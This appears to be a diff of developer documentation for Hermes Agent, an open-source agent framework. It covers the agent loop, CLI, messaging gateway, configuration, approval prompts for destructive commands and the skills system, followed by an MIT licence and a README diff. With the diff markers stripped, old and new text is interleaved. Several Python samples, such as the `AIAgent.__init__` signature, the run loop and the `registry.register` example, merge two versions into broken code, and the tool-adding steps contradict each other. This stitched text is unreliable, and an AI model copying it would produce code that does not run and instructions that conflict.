│ ├── approval.py # Dangerous command detection + per-session approval
│ ├── environments/ # Terminal execution backends
│ ├── base.py # BaseEnvironment ABC
│ │ ├── local.py # Local execution with interrupt support
│ ├── docker.py # Docker container execution
│ ├── ssh.py # SSH remote execution
│ ├── singularity.py # Singularity/Apptainer + SIF management
├── modal.py # Modal cloud execution
│ │ └── daytona.py # Daytona cloud sandboxes
├── terminal_tool.py # Terminal orchestration (sudo, lifecycle, factory)
│ ├── todo_tool.py # Planning & task management
│ ├── process_registry.py # Background process management
│ └── ... # Other tool files
├── gateway/ # Messaging platform adapters
│ ├── platforms/ # Platform-specific adapters (telegram, discord, slack, whatsapp)
│ └── ...
├── cron/ # Scheduler implementation
├── environments/ # RL training environments (Atropos integration)
├── skills/ # Bundled skill sources
├── optional-skills/ # Official optional skills (not activated by default)
├── cli.py # Interactive CLI orchestrator (HermesCLI class)
├── run_agent.py # AIAgent class (core conversation loop)
├── model_tools.py # Tool orchestration (thin layer over tools/registry.py)
├── toolsets.py # Tool groupings
├── toolset_distributions.py # Probability-based tool selection
├── hermes_cli/ # CLI subcommands and setup
│ ├── main.py # Entry point — all `hermes` subcommands
│ ├── config.py # DEFAULT_CONFIG, OPTIONAL_ENV_VARS, migration
│ ├── commands.py # Slash command definitions + SlashCommandCompleter
│ ├── callbacks.py # Terminal callbacks (clarify, sudo, approval)
── setup.py # Interactive setup wizard
├── tools/ # Tool implementations (one file per tool)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection
│ ├── terminal_tool.py # Terminal orchestration
│ ├── process_registry.py # Background process management
│ ├── file_tools.py # File read/write/search/patch
── web_tools.py # Firecrawl search/extract
│ ├── browser_tool.py # Browserbase browser automation
│ ├── code_execution_tool.py # execute_code sandbox
│ ├── delegate_tool.py # Subagent delegation
│ ├── mcp_tool.py # MCP client (~1050 lines)
└── environments/ # Terminal backends (local, docker, ssh, modal, daytona, singularity)
├── gateway/ # Messaging platform gateway
│ ├── run.py # Main loop, slash commands, message dispatch
│ ├── session.py # SessionStore — conversation persistence
└── platforms/ # Adapters: telegram, discord, slack, whatsapp, homeassistant, signal
├── cron/ # Scheduler (jobs.py, scheduler.py)
├── environments/ # RL training environments (Atropos)
├── tests/ # Pytest suite (~2500+ tests)
└── batch_runner.py # Parallel batch processing
```
**User Configuration** (stored in `~/.hermes/`):
- `~/.hermes/config.yaml` - Settings (model, terminal, toolsets, etc.)
- `~/.hermes/.env` - API keys and secrets
- `~/.hermes/pairing/` - DM pairing data
- `~/.hermes/hooks/` - Custom event hooks
- `~/.hermes/image_cache/` - Cached user images
- `~/.hermes/audio_cache/` - Cached user voice messages
- `~/.hermes/sticker_cache.json` - Telegram sticker descriptions
**User config:** `~/.hermes/config.yaml` (settings), `~/.hermes/.env` (API keys)
## File Dependency Chain
@@ -86,603 +68,175 @@ model_tools.py (imports tools/registry + triggers tool discovery)
run_agent.py, cli.py, batch_runner.py, environments/
```
Each tool file co-locates its schema, handler, and registration. `model_tools.py` is a thin orchestration layer.
---
## AIAgent Class
The main agent is implemented in `run_agent.py`:
## AIAgent Class (run_agent.py)
```python
class AIAgent:
def __init__(
self,
model: str = "anthropic/claude-sonnet-4",
api_key: str = None,
base_url: str = "https://openrouter.ai/api/v1",
max_iterations: int = 60, # Max tool-calling loops
def __init__(self,
model: str = "anthropic/claude-opus-4.6",
max_iterations: int = 90,
enabled_toolsets: list = None,
disabled_toolsets: list = None,
verbose_logging: bool = False,
quiet_mode: bool = False, # Suppress progress output
tool_progress_callback: callable = None, # Called on each tool use
):
# Initialize OpenAI client, load tools based on toolsets
...
def chat(self, user_message: str, task_id: str = None) -> str:
# Main entry point - runs the agent loop
...
quiet_mode: bool = False,
save_trajectories: bool = False,
platform: str = None, # "cli", "telegram", etc.
session_id: str = None,
skip_context_files: bool = False,
skip_memory: bool = False,
# ... plus provider, api_mode, callbacks, routing params
): ...
def chat(self, message: str) -> str:
"""Simple interface — returns final response string."""
def run_conversation(self, user_message: str, system_message: str = None,
conversation_history: list = None, task_id: str = None) -> dict:
"""Full interface — returns dict with final_response + messages."""
```
### Agent Loop
The core loop in `_run_agent_loop()`:
```
1. Add user message to conversation
2. Call LLM with tools
3. If LLM returns tool calls:
- Execute each tool
- Add tool results to conversation
- Go to step 2
4. If LLM returns text response:
- Return response to user
```
The core loop is inside `run_conversation()` — entirely synchronous:
```python
while turns < max_turns:
response = client.chat.completions.create(
model=model,
messages=messages,
tools=tool_schemas,
)
while api_call_count < self.max_iterations and self.iteration_budget.remaining > 0:
response = client.chat.completions.create(model=model, messages=messages, tools=tool_schemas)
if response.tool_calls:
for tool_call in response.tool_calls:
result = await execute_tool(tool_call)
result = handle_function_call(tool_call.name, tool_call.args, task_id)
messages.append(tool_result_message(result))
turns += 1
api_call_count += 1
else:
return response.content
```
### Conversation Management
Messages are stored as a list of dicts following OpenAI format:
```python
messages = [
{"role": "system", "content": "You are a helpful assistant..."},
{"role": "user", "content": "Search for Python tutorials"},
{"role": "assistant", "content": None, "tool_calls": [...]},
{"role": "tool", "tool_call_id": "...", "content": "..."},
{"role": "assistant", "content": "Here's what I found..."},
]
```
### Reasoning Model Support
For models that support chain-of-thought reasoning:
- Extract `reasoning_content` from API responses
- Store in `assistant_msg["reasoning"]` for trajectory export
- Pass back via `reasoning_content` field on subsequent turns
Messages follow OpenAI format: `{"role": "system/user/assistant/tool", ...}`. Reasoning content is stored in `assistant_msg["reasoning"]`.
---
## CLI Architecture (cli.py)
The interactive CLI uses:
- **Rich** - For the welcome banner and styled panels
- **prompt_toolkit** - For fixed input area with history, `patch_stdout`, slash command autocomplete, and floating completion menus
- **KawaiiSpinner** (in run_agent.py) - Animated kawaii faces during API calls; clean `┊` activity feed for tool execution results
Key components:
- `HermesCLI` class - Main CLI controller with commands and conversation loop
- `SlashCommandCompleter` - Autocomplete dropdown for `/commands` (type `/` to see all)
- `agent/skill_commands.py` - Scans skills and builds invocation messages (shared with gateway)
- `load_cli_config()` - Loads config, sets environment variables for terminal
- `build_welcome_banner()` - Displays ASCII art logo, tools, and skills summary
CLI UX notes:
- Thinking spinner (during LLM API call) shows animated kawaii face + verb (`(⌐■_■) deliberating...`)
- When LLM returns tool calls, the spinner clears silently (no "got it!" noise)
- Tool execution results appear as a clean activity feed: `┊ {emoji} {verb} {detail} {duration}`
- "got it!" only appears when the LLM returns a final text response (`⚕ ready`)
- The prompt shows `⚕ ` when the agent is working, `` when idle
- Pasting 5+ lines auto-saves to `~/.hermes/pastes/` and collapses to a reference
- Multi-line input via Alt+Enter or Ctrl+J
- `/commands` - Process user commands like `/help`, `/clear`, `/personality`, etc.
- `/skill-name` - Invoke installed skills directly (e.g., `/axolotl`, `/gif-search`)
CLI uses `quiet_mode=True` when creating AIAgent to suppress verbose logging.
### Skill Slash Commands
Every installed skill in `~/.hermes/skills/` is automatically registered as a slash command.
The skill name (from frontmatter or folder name) becomes the command: `axolotl``/axolotl`.
Implementation (`agent/skill_commands.py`, shared between CLI and gateway):
1. `scan_skill_commands()` scans all SKILL.md files at startup, filtering out skills incompatible with the current OS platform (via the `platforms` frontmatter field)
2. `build_skill_invocation_message()` loads the SKILL.md content and builds a user-turn message
3. The message includes the full skill content, a list of supporting files (not loaded), and the user's instruction
4. Supporting files can be loaded on demand via the `skill_view` tool
5. Injected as a **user message** (not system prompt) to preserve prompt caching
- **Rich** for banner/panels, **prompt_toolkit** for input with autocomplete
- **KawaiiSpinner** (`agent/display.py`) — animated faces during API calls, `┊` activity feed for tool results
- `load_cli_config()` in cli.py merges hardcoded defaults + user config YAML
- `process_command()` is a method on `HermesCLI` (not in commands.py)
- Skill slash commands: `agent/skill_commands.py` scans `~/.hermes/skills/`, injects as **user message** (not system prompt) to preserve prompt caching
### Adding CLI Commands
1. Add to `COMMANDS` dict with description
2. Add handler in `process_command()` method
3. For persistent settings, use `save_config_value()` to update config
---
## Hermes CLI Commands
The unified `hermes` command provides all functionality:
| Command | Description |
|---------|-------------|
| `hermes` | Interactive chat (default) |
| `hermes chat -q "..."` | Single query mode |
| `hermes setup` | Configure API keys and settings |
| `hermes config` | View current configuration |
| `hermes config edit` | Open config in editor |
| `hermes config set KEY VAL` | Set a specific value |
| `hermes config check` | Check for missing config |
| `hermes config migrate` | Prompt for missing config interactively |
| `hermes status` | Show configuration status |
| `hermes doctor` | Diagnose issues |
| `hermes update` | Update to latest (checks for new config) |
| `hermes uninstall` | Uninstall (can keep configs for reinstall) |
| `hermes gateway` | Start gateway (messaging + cron scheduler) |
| `hermes gateway setup` | Configure messaging platforms interactively |
| `hermes gateway install` | Install gateway as system service |
| `hermes cron list` | View scheduled jobs |
| `hermes cron status` | Check if cron scheduler is running |
| `hermes version` | Show version info |
| `hermes pairing list/approve/revoke` | Manage DM pairing codes |
---
## Messaging Gateway
The gateway connects Hermes to Telegram, Discord, Slack, and WhatsApp.
### Setup
The interactive setup wizard handles platform configuration:
```bash
hermes gateway setup # Arrow-key menu of all platforms, configure tokens/allowlists/home channels
```
This is the recommended way to configure messaging. It shows which platforms are already set up, walks through each one interactively, and offers to start/restart the gateway service at the end.
Platforms can also be configured manually in `~/.hermes/.env`:
### Configuration (in `~/.hermes/.env`):
```bash
# Telegram
TELEGRAM_BOT_TOKEN=123456:ABC-DEF... # From @BotFather
TELEGRAM_ALLOWED_USERS=123456789,987654 # Comma-separated user IDs (from @userinfobot)
# Discord
DISCORD_BOT_TOKEN=MTIz... # From Developer Portal
DISCORD_ALLOWED_USERS=123456789012345678 # Comma-separated user IDs
# Agent Behavior
HERMES_MAX_ITERATIONS=60 # Max tool-calling iterations
MESSAGING_CWD=/home/myuser # Terminal working directory for messaging
# Tool progress is configured in config.yaml (display.tool_progress: off|new|all|verbose)
```
### Working Directory Behavior
- **CLI (`hermes` command)**: Uses current directory (`.``os.getcwd()`)
- **Messaging (Telegram/Discord)**: Uses `MESSAGING_CWD` (default: home directory)
This is intentional: CLI users are in a terminal and expect the agent to work in their current directory, while messaging users need a consistent starting location.
### Security (User Allowlists):
**IMPORTANT**: By default, the gateway denies all users who are not in an allowlist or paired via DM.
The gateway checks `{PLATFORM}_ALLOWED_USERS` environment variables:
- If set: Only listed user IDs can interact with the bot
- If unset: All users are denied unless `GATEWAY_ALLOW_ALL_USERS=true` is set
Users can find their IDs:
- **Telegram**: Message [@userinfobot](https://t.me/userinfobot)
- **Discord**: Enable Developer Mode, right-click name → Copy ID
### DM Pairing System
Instead of static allowlists, users can pair via one-time codes:
1. Unknown user DMs the bot → receives pairing code
2. Owner runs `hermes pairing approve <platform> <code>`
3. User is permanently authorized
Security: 8-char codes, 1-hour expiry, rate-limited (1/10min/user), max 3 pending per platform, lockout after 5 failed attempts, `chmod 0600` on data files.
Files: `gateway/pairing.py`, `hermes_cli/pairing.py`
### Event Hooks
Hooks fire at lifecycle points. Place hook directories in `~/.hermes/hooks/`:
```
~/.hermes/hooks/my-hook/
├── HOOK.yaml # name, description, events list
└── handler.py # async def handle(event_type, context): ...
```
Events: `gateway:startup`, `session:start`, `session:reset`, `agent:start`, `agent:step`, `agent:end`, `command:*`
The `agent:step` event fires each iteration of the tool-calling loop with tool names and results.
Files: `gateway/hooks.py`
### Tool Progress Notifications
When `tool_progress` is enabled in `config.yaml`, the bot sends status messages as it works:
- `💻 \`ls -la\`...` (terminal commands show the actual command)
- `🔍 web_search...`
- `📄 web_extract...`
- `🐍 execute_code...` (programmatic tool calling sandbox)
- `🔀 delegate_task...` (subagent delegation)
- `❓ clarify...` (user question, CLI-only)
Modes:
- `new`: Only when switching to a different tool (less spam)
- `all`: Every single tool call
### Typing Indicator
The gateway keeps the "typing..." indicator active throughout processing, refreshing every 4 seconds. This lets users know the bot is working even during long tool-calling sequences.
### Platform Toolsets:
Each platform has a dedicated toolset in `toolsets.py`:
- `hermes-telegram`: Full tools including terminal (with safety checks)
- `hermes-discord`: Full tools including terminal
- `hermes-whatsapp`: Full tools including terminal
---
## Configuration System
Configuration files are stored in `~/.hermes/` for easy user access:
- `~/.hermes/config.yaml` - All settings (model, terminal, compression, etc.)
- `~/.hermes/.env` - API keys and secrets
### Adding New Configuration Options
When adding new configuration variables, you MUST follow this process:
#### For config.yaml options:
1. Add to `DEFAULT_CONFIG` in `hermes_cli/config.py`
2. **CRITICAL**: Bump `_config_version` in `DEFAULT_CONFIG` when adding required fields
3. This triggers migration prompts for existing users on next `hermes update` or `hermes setup`
Example:
```python
DEFAULT_CONFIG = {
# ... existing config ...
"new_feature": {
"enabled": True,
"option": "default_value",
},
# BUMP THIS when adding required fields
"_config_version": 2, # Was 1, now 2
}
```
#### For .env variables (API keys/secrets):
1. Add to `REQUIRED_ENV_VARS` or `OPTIONAL_ENV_VARS` in `hermes_cli/config.py`
2. Include metadata for the migration system:
```python
OPTIONAL_ENV_VARS = {
# ... existing vars ...
"NEW_API_KEY": {
"description": "What this key is for",
"prompt": "Display name in prompts",
"url": "https://where-to-get-it.com/",
"tools": ["tools_it_enables"], # What tools need this
"password": True, # Mask input
},
}
```
#### Update related files:
- `hermes_cli/setup.py` - Add prompts in the setup wizard
- `cli-config.yaml.example` - Add example with comments
- Update README.md if user-facing
### Config Version Migration
The system uses `_config_version` to detect outdated configs:
1. `check_for_missing_config()` compares user config to `DEFAULT_CONFIG`
2. `migrate_config()` interactively prompts for missing values
3. Called automatically by `hermes update` and optionally by `hermes setup`
---
## Environment Variables
API keys are loaded from `~/.hermes/.env`:
- `OPENROUTER_API_KEY` - Main LLM API access (primary provider)
- `FIRECRAWL_API_KEY` - Web search/extract tools
- `FIRECRAWL_API_URL` - Self-hosted Firecrawl endpoint (optional)
- `BROWSERBASE_API_KEY` / `BROWSERBASE_PROJECT_ID` - Browser automation
- `FAL_KEY` - Image generation (FLUX model)
- `NOUS_API_KEY` - Vision and Mixture-of-Agents tools
Terminal tool configuration (in `~/.hermes/config.yaml`):
- `terminal.backend` - Backend: local, docker, singularity, modal, daytona, or ssh
- `terminal.cwd` - Working directory ("." = host CWD for local only; for remote backends set an absolute path inside the target, or omit to use the backend's default)
- `terminal.docker_image` - Image for Docker backend
- `terminal.singularity_image` - Image for Singularity backend
- `terminal.modal_image` - Image for Modal backend
- `terminal.daytona_image` - Image for Daytona backend
- `DAYTONA_API_KEY` - API key for Daytona backend (in .env)
- SSH: `TERMINAL_SSH_HOST`, `TERMINAL_SSH_USER`, `TERMINAL_SSH_KEY` in .env
Agent behavior (in `~/.hermes/.env`):
- `HERMES_MAX_ITERATIONS` - Max tool-calling iterations (default: 60)
- `MESSAGING_CWD` - Working directory for messaging platforms (default: ~)
- `display.tool_progress` in config.yaml - Tool progress: `off`, `new`, `all`, `verbose`
- `OPENAI_API_KEY` - Voice transcription (Whisper STT)
- `SLACK_BOT_TOKEN` / `SLACK_APP_TOKEN` - Slack integration (Socket Mode)
- `SLACK_ALLOWED_USERS` - Comma-separated Slack user IDs
- `HERMES_HUMAN_DELAY_MODE` - Response pacing: off/natural/custom
- `HERMES_HUMAN_DELAY_MIN_MS` / `HERMES_HUMAN_DELAY_MAX_MS` - Custom delay range
### Dangerous Command Approval
The terminal tool includes safety checks for potentially destructive commands (e.g., `rm -rf`, `DROP TABLE`, `chmod 777`, etc.):
**Behavior by Backend:**
- **Docker/Singularity/Modal**: Commands run unrestricted (isolated containers)
- **Local/SSH**: Dangerous commands trigger approval flow
**Approval Flow (CLI):**
```
⚠️ Potentially dangerous command detected: recursive delete
rm -rf /tmp/test
[o]nce | [s]ession | [a]lways | [d]eny
Choice [o/s/a/D]:
```
**Approval Flow (Messaging):**
- Command is blocked with explanation
- Agent explains the command was blocked for safety
- User must add the pattern to their allowlist via `hermes config edit` or run the command directly on their machine
**Configuration:**
- `command_allowlist` in `~/.hermes/config.yaml` stores permanently allowed patterns
- Add patterns via "always" approval or edit directly
**Sudo Handling (Messaging):**
- If sudo fails over messaging, output includes tip to add `SUDO_PASSWORD` to `~/.hermes/.env`
---
## Background Process Management
The `process` tool works alongside `terminal` for managing long-running background processes:
**Starting a background process:**
```python
terminal(command="pytest -v tests/", background=true)
# Returns: {"session_id": "proc_abc123", "pid": 12345, ...}
```
**Managing it with the process tool:**
- `process(action="list")` -- show all running/recent processes
- `process(action="poll", session_id="proc_abc123")` -- check status + new output
- `process(action="log", session_id="proc_abc123")` -- full output with pagination
- `process(action="wait", session_id="proc_abc123", timeout=600)` -- block until done
- `process(action="kill", session_id="proc_abc123")` -- terminate
- `process(action="write", session_id="proc_abc123", data="y")` -- send stdin
- `process(action="submit", session_id="proc_abc123", data="yes")` -- send + Enter
**Key behaviors:**
- Background processes execute through the configured terminal backend (local/Docker/Modal/Daytona/SSH/Singularity) -- never directly on the host unless `TERMINAL_ENV=local`
- The `wait` action blocks the tool call until the process finishes, times out, or is interrupted by a new user message
- PTY mode (`pty=true` on terminal) enables interactive CLI tools (Codex, Claude Code)
- In RL training, background processes are auto-killed when the episode ends (`tool_context.cleanup()`)
- In the gateway, sessions with active background processes are exempt from idle reset
- The process registry checkpoints to `~/.hermes/processes.json` for crash recovery
Files: `tools/process_registry.py` (registry + handler), `tools/terminal_tool.py` (spawn integration)
1. Add to `COMMANDS` dict in `hermes_cli/commands.py`
2. Add handler in `HermesCLI.process_command()` in `cli.py`
3. For persistent settings, use `save_config_value()` in `cli.py`
---
## Adding New Tools
Adding a tool requires changes in **2 files** (the tool file and `toolsets.py`):
1. **Create `tools/your_tool.py`** with handler, schema, check function, and registry call:
Requires changes in **3 files**:
**1. Create `tools/your_tool.py`:**
```python
# tools/example_tool.py
import json
import os
import json, os
from tools.registry import registry
def check_example_requirements() -> bool:
"""Check if required API keys/dependencies are available."""
def check_requirements() -> bool:
return bool(os.getenv("EXAMPLE_API_KEY"))
def example_tool(param: str, task_id: str = None) -> str:
"""Execute the tool and return JSON string result."""
try:
result = {"success": True, "data": "..."}
return json.dumps(result, ensure_ascii=False)
except Exception as e:
return json.dumps({"error": str(e)}, ensure_ascii=False)
EXAMPLE_SCHEMA = {
"name": "example_tool",
"description": "Does something useful.",
"parameters": {
"type": "object",
"properties": {
"param": {"type": "string", "description": "The parameter"}
},
"required": ["param"]
}
}
return json.dumps({"success": True, "data": "..."})
registry.register(
name="example_tool",
toolset="example",
schema=EXAMPLE_SCHEMA,
handler=lambda args, **kw: example_tool(
param=args.get("param", ""), task_id=kw.get("task_id")),
check_fn=check_example_requirements,
schema={"name": "example_tool", "description": "...", "parameters": {...}},
handler=lambda args, **kw: example_tool(param=args.get("param", ""), task_id=kw.get("task_id")),
check_fn=check_requirements,
requires_env=["EXAMPLE_API_KEY"],
)
```
2. **Add to `toolsets.py`**: Add `"example_tool"` to `_HERMES_CORE_TOOLS` if it should be in all platform toolsets, or create a new toolset entry.
**2. Add import** in `model_tools.py` `_discover_tools()` list.
3. **Add discovery import** in `model_tools.py`'s `_discover_tools()` list: `"tools.example_tool"`.
**3. Add to `toolsets.py`** — either `_HERMES_CORE_TOOLS` (all platforms) or a new toolset.
That's it. The registry handles schema collection, dispatch, availability checking, and error wrapping automatically. No edits to `TOOLSET_REQUIREMENTS`, `handle_function_call()`, `get_all_tool_names()`, or any other data structure.
The registry handles schema collection, dispatch, availability checking, and error wrapping. All handlers MUST return a JSON string.
**Optional:** Add to `OPTIONAL_ENV_VARS` in `hermes_cli/config.py` for the setup wizard, and to `toolset_distributions.py` for batch processing.
**Special case: tools that need agent-level state** (like `todo`, `memory`):
These are intercepted by `run_agent.py`'s tool dispatch loop *before* `handle_function_call()`. The registry still holds their schemas, but dispatch returns a stub error as a safety fallback. See `todo_tool.py` for the pattern.
All tool handlers MUST return a JSON string. The registry's `dispatch()` wraps all exceptions in `{"error": "..."}` automatically.
### Dynamic Tool Availability
Tools declare their requirements at registration time via `check_fn` and `requires_env`. The registry checks `check_fn()` when building tool definitions -- tools whose check fails are silently excluded.
### Stateful Tools
Tools that maintain state (terminal, browser) require:
- `task_id` parameter for session isolation between concurrent tasks
- `cleanup_*()` function to release resources
- Cleanup is called automatically in run_agent.py after conversation completes
**Agent-level tools** (todo, memory): intercepted by `run_agent.py` before `handle_function_call()`. See `todo_tool.py` for the pattern.
---
## Trajectory Format
## Adding Configuration
Conversations are saved in ShareGPT format for training:
```json
{"from": "system", "value": "System prompt with <tools>...</tools>"}
{"from": "human", "value": "User message"}
{"from": "gpt", "value": "<think>reasoning</think>\n<tool_call>{...}</tool_call>"}
{"from": "tool", "value": "<tool_response>{...}</tool_response>"}
{"from": "gpt", "value": "Final response"}
```
Tool calls use `<tool_call>` XML tags, responses use `<tool_response>` tags, reasoning uses `<think>` tags.
### Trajectory Export
### config.yaml options:
1. Add to `DEFAULT_CONFIG` in `hermes_cli/config.py`
2. Bump `_config_version` (currently 5) to trigger migration for existing users
### .env variables:
1. Add to `OPTIONAL_ENV_VARS` in `hermes_cli/config.py` with metadata:
```python
agent = AIAgent(save_trajectories=True)
agent.chat("Do something")
# Saves to trajectories/*.jsonl in ShareGPT format
"NEW_API_KEY": {
"description": "What it's for",
"prompt": "Display name",
"url": "https://...",
"password": True,
"category": "tool", # provider, tool, messaging, setting
},
```
### Config loaders (two separate systems):
| Loader | Used by | Location |
|--------|---------|----------|
| `load_cli_config()` | CLI mode | `cli.py` |
| `load_config()` | `hermes tools`, `hermes setup` | `hermes_cli/config.py` |
| Direct YAML load | Gateway | `gateway/run.py` |
---
## Batch Processing (batch_runner.py)
## Important Policies
For processing multiple prompts:
- Parallel execution with multiprocessing
- Content-based resume for fault tolerance (matches on prompt text, not indices)
- Toolset distributions control probabilistic tool availability per prompt
- Output: `data/<run_name>/trajectories.jsonl` (combined) + individual batch files
### Prompt Caching Must Not Break
Hermes-Agent ensures caching remains valid throughout a conversation. **Do NOT implement changes that would:**
- Alter past context mid-conversation
- Change toolsets mid-conversation
- Reload memories or rebuild system prompts mid-conversation
Cache-breaking forces dramatically higher costs. The ONLY time we alter context is during context compression.
### Working Directory Behavior
- **CLI**: Uses current directory (`.``os.getcwd()`)
- **Messaging**: Uses `MESSAGING_CWD` env var (default: home directory)
---
## Known Pitfalls
### DO NOT use `simple_term_menu` for interactive menus
Rendering bugs in tmux/iTerm2 — ghosting on scroll. Use `curses` (stdlib) instead. See `hermes_cli/tools_config.py` for the pattern.
### DO NOT use `\033[K` (ANSI erase-to-EOL) in spinner/display code
Leaks as literal `?[K` text under `prompt_toolkit`'s `patch_stdout`. Use space-padding: `f"\r{line}{' ' * pad}"`.
### `_last_resolved_tool_names` is a process-global in `model_tools.py`
When subagents overwrite this global, `execute_code` calls after delegation may fail with missing tool imports. Known bug.
### Tests must not write to `~/.hermes/`
The `_isolate_hermes_home` autouse fixture in `tests/conftest.py` redirects `HERMES_HOME` to a temp dir. Never hardcode `~/.hermes/` paths in tests.
---
## Testing
```bash
python batch_runner.py \
--dataset_file=prompts.jsonl \
--batch_size=20 \
--num_workers=4 \
--run_name=my_run
source .venv/bin/activate
python -m pytest tests/ -q # Full suite (~2500 tests, ~2 min)
python -m pytest tests/test_model_tools.py -q # Toolset resolution
python -m pytest tests/test_cli_init.py -q # CLI config loading
python -m pytest tests/gateway/ -q # Gateway tests
python -m pytest tests/tools/ -q # Tool-level tests
```
---
## Skills System
Skills are on-demand knowledge documents the agent can load. Compatible with the [agentskills.io](https://agentskills.io/specification) open standard.
```
skills/
├── mlops/ # Category folder
│ ├── axolotl/ # Skill folder
│ │ ├── SKILL.md # Main instructions (required)
│ │ ├── references/ # Additional docs, API specs
│ │ ├── templates/ # Output formats, configs
│ │ └── assets/ # Supplementary files (agentskills.io)
│ └── vllm/
│ └── SKILL.md
├── .hub/ # Skills Hub state (gitignored)
│ ├── lock.json # Installed skill provenance
│ ├── quarantine/ # Pending security review
│ ├── audit.log # Security scan history
│ ├── taps.json # Custom source repos
│ └── index-cache/ # Cached remote indexes
```
**Progressive disclosure** (token-efficient):
1. `skills_categories()` - List category names (~50 tokens)
2. `skills_list(category)` - Name + description per skill (~3k tokens)
3. `skill_view(name)` - Full content + tags + linked files
SKILL.md files use YAML frontmatter (agentskills.io format):
```yaml
---
name: skill-name
description: Brief description for listing
version: 1.0.0
platforms: [macos] # Optional — restrict to specific OS (macos/linux/windows)
metadata:
hermes:
tags: [tag1, tag2]
related_skills: [other-skill]
---
# Skill Content...
```
**Platform filtering** — Skills with a `platforms` field are automatically excluded from the system prompt index, `skills_list()`, and slash commands on incompatible platforms. Skills without the field load everywhere (backward compatible). See `skills/apple/` for macOS-only examples (iMessage, Reminders, Notes, FindMy).
**Skills Hub** — user-driven skill search/install from online registries and official optional skills. Sources: official optional skills (shipped with repo, labeled "official"), GitHub (openai/skills, anthropics/skills, custom taps), ClawHub, Claude marketplace, LobeHub. Not exposed as an agent tool — the model cannot search for or install skills. Users manage skills via `hermes skills browse/search/install` CLI commands or the `/skills` slash command in chat.
Key files:
- `tools/skills_tool.py` — Agent-facing skill list/view (progressive disclosure)
- `tools/skills_guard.py` — Security scanner (regex + LLM audit, trust-aware install policy)
- `tools/skills_hub.py` — Source adapters (OptionalSkillSource, GitHub, ClawHub, Claude marketplace, LobeHub), lock file, auth
- `hermes_cli/skills_hub.py` — CLI subcommands + `/skills` slash command handler
---
## Testing Changes
After making changes:
1. Run `hermes doctor` to check setup
2. Run `hermes config check` to verify config
3. Test with `hermes chat -q "test message"`
4. For new config options, test fresh install: `rm -rf ~/.hermes && hermes setup`
Always run the full suite before pushing changes.

View File

@@ -118,7 +118,7 @@ hermes-agent/
├── cli.py # HermesCLI class — interactive TUI, prompt_toolkit integration
├── model_tools.py # Tool orchestration (thin layer over tools/registry.py)
├── toolsets.py # Tool groupings and presets (hermes-cli, hermes-telegram, etc.)
├── hermes_state.py # SQLite session database with FTS5 full-text search
├── hermes_state.py # SQLite session database with FTS5 full-text search, session titles
├── batch_runner.py # Parallel batch processing for trajectory generation
├── agent/ # Agent internals (extracted modules)
@@ -218,7 +218,7 @@ User message → AIAgent._run_agent_loop()
- **Self-registering tools**: Each tool file calls `registry.register()` at import time. `model_tools.py` triggers discovery by importing all tool modules.
- **Toolset grouping**: Tools are grouped into toolsets (`web`, `terminal`, `file`, `browser`, etc.) that can be enabled/disabled per platform.
- **Session persistence**: All conversations are stored in SQLite (`hermes_state.py`) with full-text search. JSON logs go to `~/.hermes/sessions/`.
- **Session persistence**: All conversations are stored in SQLite (`hermes_state.py`) with full-text search and unique session titles. JSON logs go to `~/.hermes/sessions/`.
- **Ephemeral injection**: System prompts and prefill messages are injected at API call time, never persisted to the database or logs.
- **Provider abstraction**: The agent works with any OpenAI-compatible API. Provider resolution happens at init time (Nous Portal OAuth, OpenRouter API key, or custom endpoint).
- **Provider routing**: When using OpenRouter, `provider_routing` in config.yaml controls provider selection (sort by throughput/latency/price, allow/ignore specific providers, data retention policies). These are injected as `extra_body.provider` in API requests.

21
LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 Nous Research
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

View File

@@ -17,7 +17,7 @@ Use any model you want — [Nous Portal](https://portal.nousresearch.com), [Open
<table>
<tr><td><b>A real terminal interface</b></td><td>Full TUI with multiline editing, slash-command autocomplete, conversation history, interrupt-and-redirect, and streaming tool output.</td></tr>
<tr><td><b>Lives where you do</b></td><td>Telegram, Discord, Slack, WhatsApp, and CLI — all from a single gateway process. Voice memo transcription, cross-platform conversation continuity.</td></tr>
<tr><td><b>Lives where you do</b></td><td>Telegram, Discord, Slack, WhatsApp, Signal, and CLI — all from a single gateway process. Voice memo transcription, cross-platform conversation continuity.</td></tr>
<tr><td><b>A closed learning loop</b></td><td>Agent-curated memory with periodic nudges. Autonomous skill creation after complex tasks. Skills self-improve during use. FTS5 session search with LLM summarization for cross-session recall. <a href="https://github.com/plastic-labs/honcho">Honcho</a> dialectic user modeling. Compatible with the <a href="https://agentskills.io">agentskills.io</a> open standard.</td></tr>
<tr><td><b>Scheduled automations</b></td><td>Built-in cron scheduler with delivery to any platform. Daily reports, nightly backups, weekly audits — all in natural language, running unattended.</td></tr>
<tr><td><b>Delegates and parallelizes</b></td><td>Spawn isolated subagents for parallel workstreams. Write Python scripts that call tools via RPC, collapsing multi-step pipelines into zero-context-cost turns.</td></tr>
@@ -71,7 +71,7 @@ All documentation lives at **[hermes-agent.nousresearch.com/docs](https://hermes
| [Quickstart](https://hermes-agent.nousresearch.com/docs/getting-started/quickstart) | Install → setup → first conversation in 2 minutes |
| [CLI Usage](https://hermes-agent.nousresearch.com/docs/user-guide/cli) | Commands, keybindings, personalities, sessions |
| [Configuration](https://hermes-agent.nousresearch.com/docs/user-guide/configuration) | Config file, providers, models, all options |
| [Messaging Gateway](https://hermes-agent.nousresearch.com/docs/user-guide/messaging) | Telegram, Discord, Slack, WhatsApp, Home Assistant |
